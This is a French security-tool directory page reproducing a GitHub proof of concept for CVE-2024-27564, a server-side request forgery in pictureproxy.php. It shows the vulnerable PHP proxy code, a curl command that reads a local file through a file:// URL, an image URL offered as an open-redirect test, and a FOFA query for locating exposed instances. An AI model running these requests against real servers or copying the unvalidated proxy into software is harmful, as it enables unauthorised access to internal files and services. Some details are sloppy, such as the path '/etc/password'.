Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SSRF-Exploit-CVE-2024-27564 — Preuve de concept d'exploit pour CVE-2024-27564, démontrant une SSRF via un paramètre URL non validé dans pictureproxy.php. Inclut des tests basés sur curl et une recherche FOFA pour les instances vulnérables. | Kitploit
Outils/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

Preuve de concept d'exploit pour CVE-2024-27564, démontrant une SSRF via un paramètre URL non validé dans pictureproxy.php. Inclut des tests basés sur curl et une recherche FOFA pour les instances vulnérables.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
145il y a 1 anPas encore vérifié
Partager

SSRF-Exploit-CVE-2024-27564

Titre du projet

Ce projet démontre une vulnérabilité de type Server-Side Request Forgery (SSRF) dans le fichier pictureproxy.php.

Description

Une vulnérabilité dans pictureproxy.php permet à des attaquants distants d'effectuer des requêtes arbitraires en injectant des URLs dans le paramètre url. Cette vulnérabilité SSRF peut être exploitée sans authentification, ce qui la rend particulièrement dangereuse.

Le code vulnérable se trouve dans le fichier pictureproxy.php. Le problème survient car la fonction ne valide pas correctement le paramètre url. La variable $_GET['url'] est transmise à la fonction file_get_contents(), qui récupère le contenu de l'URL spécifiée. Cela peut conduire à une SSRF.

Proof of Concept

Voici une preuve de concept simple qui montre comment la vulnérabilité peut être exploitée :

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Pour tester la vulnérabilité, vous pouvez utiliser la commande curl suivante :

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Testé avec une redirection ouverte

Un test utilisant une vulnérabilité de redirection ouverte :

root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

Bannière

Outils

  • FOFA : Un moteur de recherche pour les appareils Internet et les vulnérabilités. Utilisez la commande suivante pour rechercher les résultats pertinents :
root@kitploit:~
"title="ChatGPT个人专用版""

Conclusion

Ce projet souligne l'importance de valider correctement les entrées utilisateur pour éviter les vulnérabilités SSRF. Assurez-vous toujours que les paramètres comme les URLs sont soigneusement vérifiés avant d'être traités.

Télécharger l’outil